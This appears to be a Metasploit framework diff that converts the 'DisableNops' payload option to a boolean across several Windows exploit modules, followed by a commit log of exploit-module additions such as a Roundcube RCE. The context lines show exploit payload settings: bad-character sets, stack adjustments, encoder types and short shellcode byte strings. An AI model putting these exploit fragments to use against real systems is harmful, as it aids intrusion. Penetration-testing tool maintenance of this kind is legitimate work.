@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'    => 750,
          'BadChars' => "\x00",
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
-          'DisableNops' => 'True',
+          'DisableNops' => true,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
          'EncoderOptions' =>
            {
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'    => 750,
          'BadChars' => "\x00",
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
-          'DisableNops' => 'True',
+          'DisableNops' => true,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
          'EncoderOptions' =>
            {
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
          # other characters get mangled, but only in a temporary buffer
          'BadChars' => "\x00\x0a\x0d\x20\x25\x2e\x2f\x3f\x5c",
          'StackAdjustment' => -3500,
-          # 'DisableNops'	=>  'True'
+          # 'DisableNops'	=> true
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
          # format string max length
          'Space'    => 1024,
          'BadChars' => "\x00\x0a\x0d\x25\x2f\x3f\x5c",
-          'DisableNops'	=>  'True',
+          'DisableNops'	=> true,
          'StackAdjustment' 	=> -1500
        },
      'Platform'       => 'win',
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'  =>  'True',
+          'DisableNops'  => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'          => 2000,
          'BadChars'       => "\x00",
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
-          'DisableNops'    =>  'True',
+          'DisableNops'    => true,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ESI',
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
      },
      'Payload' => {
        'Space' => 4500,
-        'DisableNops' => 'True',
+        'DisableNops' => true,
      },
      'Platform' => 'win',
      'DisclosureDate' => 'Aug 05 2011',
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'  =>  'True',
+          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'  =>  'True',
+          'DisableNops'  => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'    => 5000,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
-          'DisableNops'     =>  'True'
+          'DisableNops'     => true
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x0a\x20\x0d",
          'StackAdjustment'  => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
-          'DisableNops' => 'True',
+          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x0a\x20\x0d",
          'StackAdjustment'  => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
-          'DisableNops' => 'True',
+          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x0a\x20\x0d",
          'StackAdjustment'  => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops' => 'True',
+          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space'       => 936,
-          'DisableNops' => 'True',
+          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'Space'    => 750,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-          'DisableNops'   =>  'True',
+          'DisableNops' => true,
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
jenkins-metasploit	52c5343ff7	automatic module_metadata_base.json update	2025-06-11 21:32:04 +00:00
adfoster-r7	3f69bcb3c9	Merge pull request #20300 from zeroSteiner/fix/mod/smb-version/win-ver Fix a regression in Windows version fingerprinting	2025-06-11 22:23:57 +01:00
Spencer McIntyre	8efbfc0608	Fix a regression in Windows version fingerprinting	2025-06-11 11:56:56 -04:00
jenkins-metasploit	35f770997a	automatic module_metadata_base.json update	2025-06-11 08:57:20 +00:00
msutovsky-r7	f2920f868a	Land #20291 , adds Roundcube post-authentication RCE (CVE-2025-49113) Add Remote for Roundсube CVE-2025-49113 post-authentication RCE module	2025-06-11 10:48:58 +02:00
Maksim Rogov	582e32c14e	remove timeout	2025-06-11 11:05:33 +03:00
jenkins-metasploit	ac6402993f	automatic module_metadata_base.json update	2025-06-11 05:39:50 +00:00
msutovsky-r7	a175e89d07	Land #20299 , converts DisableNops to Boolean Modules: Convert DisableNops property to Boolean in several modules	2025-06-11 07:31:53 +02:00
jenkins-metasploit	db022164de	automatic module_metadata_base.json update	2025-06-10 16:23:06 +00:00
msutovsky-r7	1ad158cd4c	Land #20297 , converts Privileged property to Bool Modules: Convert Privileged property to Boolean in several modules	2025-06-10 18:15:16 +02:00
bcoles	3272ee0f28	Modules: Convert DisableNops property to Boolean in several modules	2025-06-10 23:57:52 +10:00
jenkins-metasploit	f122e72feb	automatic module_metadata_base.json update	2025-06-10 13:36:04 +00:00
adfoster-r7	4e41af23b5	Merge pull request #20296 from bcoles/rubocop-modules-exploits-linux-ftp modules/exploits/linux/ftp: Resolve RuboCop violations	2025-06-10 14:27:45 +01:00
bcoles	304de9e1c9	Modules: Convert Privileged property to Boolean in several modules	2025-06-10 23:01:52 +10:00
bcoles	f95f5c928e	modules/exploits/linux/ftp: Resolve RuboCop violations	2025-06-10 22:36:46 +10:00
Maksim Rogov	8fe5c91801	fix parsing.rb	2025-06-10 14:29:39 +03:00
Maksim Rogov	10ab54369d	Update modules/exploits/multi/http/roundcube_auth_rce_cve_2025_49113.rb Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>	2025-06-10 14:18:44 +03:00
Maksim Rogov	97c493a924	Update modules/exploits/multi/http/roundcube_auth_rce_cve_2025_49113.rb Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>	2025-06-10 14:17:55 +03:00
Vognik	d764237230	migrated to nokogiri methods for csrf token parsing	2025-06-10 14:54:09 +04:00
Maksim Rogov	5725e6faf7	Apply suggestions from code review Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>	2025-06-10 11:09:05 +03:00
jenkins-metasploit	b6ed7f0970	automatic module_metadata_base.json update	2025-06-09 21:19:34 +00:00
adfoster-r7	899840c208	Merge pull request #20295 from bwatters-r7/fix/thinmanager-spaces Fix some spacing issues	2025-06-09 22:11:25 +01:00
Maksim Rogov	ed643c3bc6	Update roundcube_auth_rce_cve_2025_49113.md	2025-06-09 18:42:52 +03:00
Vognik	072ebafbcf	fix naming	2025-06-09 19:32:31 +04:00
Vognik	46a36c9d4c	refactor: update code per review	2025-06-09 19:28:38 +04:00
bwatters-r7	b1d5319fcb	Fix some spacing inssues	2025-06-09 09:17:11 -05:00
jenkins-metasploit	12d4527bdc	automatic module_metadata_base.json update	2025-06-09 13:46:50 +00:00
Spencer McIntyre	6f7064f8f0	Merge pull request #20293 from Chocapikk/easter-egg Add Mr. Robot Easter egg	2025-06-09 09:37:49 -04:00
jenkins-metasploit	b7f381d8b1	automatic module_metadata_base.json update	2025-06-09 12:50:23 +00:00
Brendan	ebae201198	Merge pull request #20160 from zeroSteiner/feat/mod/payload/php-adapters Add PHP adapters and refactor PHP payloads	2025-06-09 07:41:50 -05:00
jenkins-metasploit	5d61c5271e	automatic module_metadata_base.json update	2025-06-08 14:11:56 +00:00
msutovsky-r7	f20e72b6c8	Land #20256 , adds RCE module for Remote For Mac 2025.7 Add Remote for Mac 2025.6 unauthenticated RCE module	2025-06-08 16:03:58 +02:00
jenkins-metasploit	dbefbe0296	automatic module_metadata_base.json update	2025-06-08 13:57:36 +00:00
msutovsky-r7	3e1bca072a	Land #20290 , fixes space in CVE number Fix errant space in CVE number	2025-06-08 15:48:58 +02:00
Martin Sutovsky	6105b99465	Fixed response parsing	2025-06-08 15:36:37 +02:00
Martin Sutovsky	16541d9f64	Fixes notes	2025-06-08 12:17:58 +02:00
Martin Sutovsky	c9713a7184	Code reformat, rubocoping	2025-06-08 12:06:33 +02:00
Maksim Rogov	01f16ea802	Minor Fixes.rb	2025-06-08 12:47:08 +03:00
Maksim Rogov	c63649a12d	Update roundcube_auth_rce_cve_2025_49113.rb	2025-06-08 01:21:31 +03:00
Vognik	f43e8863ad	refactor: update code per review	2025-06-08 02:14:53 +04:00
Maksim Rogov	442b5aadf3	Apply suggestions from code review Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2025-06-07 23:26:03 +03:00
adfoster-r7	18c21f1ea6	Merge pull request #20170 from bcoles/msf-module-uuid Msf::Module::UUID: Generate UUID using UUID_CHARS.sample(8).join	2025-06-07 19:59:55 +01:00
root	8b1113d225	Update: Improved RCE detection logic and payload options for Remote for Mac 2025.6	2025-06-07 17:52:45 +01:00
Chocapikk	ff802129c1	Add Mr. Robot Easter egg	2025-06-07 17:55:17 +02:00
bcoles	ffcc145ccc	Msf::Module::UUID: Generate UUID using UUID_CHARS.sample(8).join	2025-06-08 00:24:27 +10:00
bcoles	aed00d1ff7	Msf::Module: Lazy-load module instance UUID	2025-06-08 00:15:04 +10:00
Maksim Rogov	d97b09a898	Rename roundcube_unauth_rce_cve_2025_49113.md to roundcube_auth_rce_cve_2025_49113.md	2025-06-07 16:46:30 +03:00
Maksim Rogov	0426d3cb4f	Rename roundcube_unauth_rce_cve_2025_49113.rb to roundcube_auth_rce_cve_2025_49113.rb	2025-06-07 16:14:28 +03:00
Maksim Rogov	906ba4fba2	Update roundcube_unauth_rce_cve_2025_49113.rb	2025-06-07 13:58:37 +03:00
Maksim Rogov	bd811a3cd1	Update roundcube_unauth_rce_cve_2025_49113.md	2025-06-07 04:45:54 +03:00
Vognik	a4638ad632	Update Documentation	2025-06-07 05:35:18 +04:00
Vognik	96d7929972	Add Documentation for Roundcube CVE-2025-49113 unauthenticated RCE module	2025-06-07 05:28:45 +04:00
Vognik	b83b021445	Add Remote for Roundcube CVE-2025-49113 unauthenticated RCE module	2025-06-07 05:28:21 +04:00
bwatters-r7	8f2b364e7b	Fix errant space in CVE number	2025-06-06 10:06:21 -05:00
jenkins-metasploit	d553aa6f0d	automatic module_metadata_base.json update	2025-06-06 12:45:11 +00:00
msutovsky-r7	0f522220d4	Land #20072 , adds Maldoc in PDF fileformat module Add Maldoc in PDF polyglot fileformat module	2025-06-06 14:36:24 +02:00
msutovsky-r7	ab57ec105a	Land #20264 , adds processing of KERB-SUPERSEDED-BY-USER error message Process and propagate KERB-SUPERSEDED-BY-USER error details	2025-06-06 13:59:09 +02:00
jenkins-metasploit	e3206fb88a	automatic module_metadata_base.json update	2025-06-05 21:52:28 +00:00
Spencer McIntyre	a1e3a23eb4	Merge pull request #20262 from bwatters-r7/fix/vcenter_vmdir_gather Fix references to LDAP Datastore Options	2025-06-05 17:44:21 -04:00
bwatters-r7	02a9eb3233	Update rescue clauses and rubocop	2025-06-05 16:33:42 -05:00
jenkins-metasploit	56dbd91168	automatic module_metadata_base.json update	2025-06-05 17:16:15 +00:00
Spencer McIntyre	66a9f332b1	Merge pull request #20283 from cdelafuente-r7/fix/20249/ldap/certifried Fix the cve_2022_26923_certifried module after the datastore option changes	2025-06-05 13:08:06 -04:00
jenkins-metasploit	e7bde75f57	automatic module_metadata_base.json update	2025-06-05 16:11:11 +00:00
Brendan	19e8e6cdf8	Merge pull request #20187 from Chocapikk/wp_ottokit Add CVE-2025-27007 in existing `exploit(multi/http/wp_suretriggers_auth_bypass)` module	2025-06-05 11:03:00 -05:00
Spencer McIntyre	0a280ae800	Merge pull request #19996 from hantwister/patch-1 Detect the CxUIUSvcChannel named pipe	2025-06-05 11:56:50 -04:00
adfoster-r7	2042fa6f27	Merge pull request #20288 from bcoles/rubocop-Style/RedundantParentheses Rubocop: Disable Style/RedundantParentheses	2025-06-05 16:20:26 +01:00
jenkins-metasploit	a18d284fb4	automatic module_metadata_base.json update	2025-06-05 15:18:07 +00:00
Brendan	cc98ef58d4	Merge pull request #20140 from h4x-x0r/CVE-2023-2915 ThinManager Path Traversal Delete (CVE-2023-2915) Module	2025-06-05 10:08:42 -05:00
Spencer McIntyre	602212fe9c	Merge pull request #20282 from SweilemCodes/docs/Jenkins_enum Jenkins Enum Documentation Added	2025-06-05 10:50:39 -04:00
Spencer McIntyre	166db38e67	Add missing newlines to render the markdown properly	2025-06-05 10:49:47 -04:00
bcoles	7df255f4cd	Rubocop: Disable Style/RedundantParentheses	2025-06-06 00:27:20 +10:00
Metasploit	f2b2fe4f60	Bump version of framework to 6.4.69	2025-06-05 05:56:26 -05:00
Metasploit	7434581e1c	Bump version of framework to 6.4.68	2025-06-05 04:47:54 -05:00
h4x-x0r	2425eb08d2	Update thinmanager_traversal_delete.rb	2025-06-05 02:57:40 +01:00
Christophe De La Fuente	b488403c73	Fix cve_2022_26923_certifried module after the datastore option changes	2025-06-04 11:22:26 +02:00
RAMELLA Sébastien	144cfd2d42	Update maldoc_in_pdf_polyglot.rb	2025-06-04 12:33:22 +04:00
RAMELLA Sébastien	b9731f8907	Update modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>	2025-06-04 12:30:09 +04:00
Theo Sweilem	ff78d179a3	Edited jenkins_enum Documentation	2025-06-03 23:36:13 -07:00
Theo Sweilem	ac4e574eea	Added jenkins_enum Documentation	2025-06-03 23:25:15 -07:00
root	7aa1d17124	rex version fix	2025-05-30 16:46:08 +01:00
root	11a51bf489	rex version payloads	2025-05-30 16:43:40 +01:00
Spencer McIntyre	634c480bd0	Update modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb Co-authored-by: Brendan <bwatters@rapid7.com>	2025-05-30 10:18:20 -04:00
root	dbfaece2a2	badchars fix + extend payloads	2025-05-30 14:19:56 +01:00
root	ca8a3c586a	added 2025.7 support	2025-05-30 14:12:52 +01:00
Spencer McIntyre	6c05ffb67d	Appease rubocop	2025-05-30 09:06:38 -04:00
Spencer McIntyre	dd6208a051	Bump the rex-random_identifier gem	2025-05-30 09:06:38 -04:00
Spencer McIntyre	960e29f64d	Update specs	2025-05-30 09:06:38 -04:00
Spencer McIntyre	f3b650a409	Major refactoring of PHP payloads and related exploits	2025-05-30 09:06:38 -04:00
Spencer McIntyre	dcaeb5266c	Define the system_block module function	2025-05-30 09:06:38 -04:00
Spencer McIntyre	9220360ed0	Add an ARCH_PHP -> ARCH_CMD adapter	2025-05-30 09:06:20 -04:00
root	69870ee703	Update Remote for Mac 2025.6 RCE module with improvements and fixes	2025-05-30 11:21:07 +01:00
Spencer McIntyre	b40dbe89ff	Always return an array of PreAuthData	2025-05-29 10:25:35 -04:00
bwatters-r7	e36336669d	Update description in module and docs to reflect nre option name	2025-05-29 08:11:33 -05:00
root	e027be9f4c	Add documentation for Remote for Mac 2025.6 unauthenticated RCE module	2025-05-29 12:30:10 +01:00
msutovsky-r7	6628e0d9e7	Update modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb This will look better in Metasploit wrapup blog Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2025-05-29 10:05:10 +02:00
root	cf3e1764c5	Finalize Remote for Mac 2025.6 RCE module (no CVE yet)	2025-05-29 04:29:15 +01:00
Spencer McIntyre	09c313003b	Propagate KERB-SUPERSEDED-BY-USER error details	2025-05-28 17:57:01 -04:00
Spencer McIntyre	74dcabfcc1	Add the definitions for KERB-SUPERSEDED-BY-USER	2025-05-28 17:38:36 -04:00
bwatters-r7	b207a8848c	Fix references to LDAP Datastore Options	2025-05-28 12:02:01 -05:00
root	38f0178ad8	Update exploit: fix PacketStorm reference, add CVE placeholder	2025-05-28 09:27:28 +01:00
root	1860c16aa8	Add Remote for Mac 2025.6 unauthenticated RCE module	2025-05-28 07:42:34 +01:00
RAMELLA Sebastien	c84056780e	fix. r7 code review Signed-off-by: RAMELLA Sebastien <sebastien.ramella@pirates.re>	2025-05-27 11:45:52 +04:00
Chocapikk	2e158d2d1a	Fix User-Agent issue	2025-05-22 23:47:20 +02:00
Chocapikk	a09a0a25eb	Fix `finalize_admin`	2025-05-21 20:18:43 +02:00
Chocapikk	0c556ff139	Fix	2025-05-21 20:10:02 +02:00
Chocapikk	38b7cfd753	Refactor	2025-05-21 19:46:47 +02:00
h4x-x0r	c29efa36a8	Update thinmanager_traversal_delete.rb	2025-05-15 21:55:07 +01:00
h4x-x0r	fa483fdee7	Update thinmanager_traversal_delete.rb	2025-05-15 21:45:38 +01:00
Chocapikk	75a3fa7ad7	Add CVE-2025-27007 in existing `exploit(multi/http/wp_suretriggers_auth_bypass)` module	2025-05-14 19:29:03 +02:00
h4x-x0r	1cc0269edf	more versions tested	2025-05-07 18:05:57 +01:00
h4x-x0r	0491d3894e	CVE-2023-2915	2025-05-07 03:45:59 +01:00
RAMELLA Sebastien	73208fda35	add optenum for output ext Signed-off-by: RAMELLA Sebastien <sebastien.ramella@pirates.re>	2025-04-27 21:02:04 +04:00
RAMELLA Sebastien	d474d9b796	content nil and empty Signed-off-by: RAMELLA Sebastien <sebastien.ramella@pirates.re>	2025-04-27 13:32:41 +04:00
RAMELLA Sebastien	dc88f3ffd9	fixes review Signed-off-by: RAMELLA Sebastien <sebastien.ramella@pirates.re>	2025-04-27 13:22:47 +04:00
RAMELLA Sebastien	0da43ef502	add maldoc in PDF polyglot Signed-off-by: RAMELLA Sebastien <sebastien.ramella@pirates.re>	2025-04-22 18:23:51 +04:00
Harrison Neal	28c0992e77	CVE-2024-9157 detection	2025-04-01 11:32:32 -04:00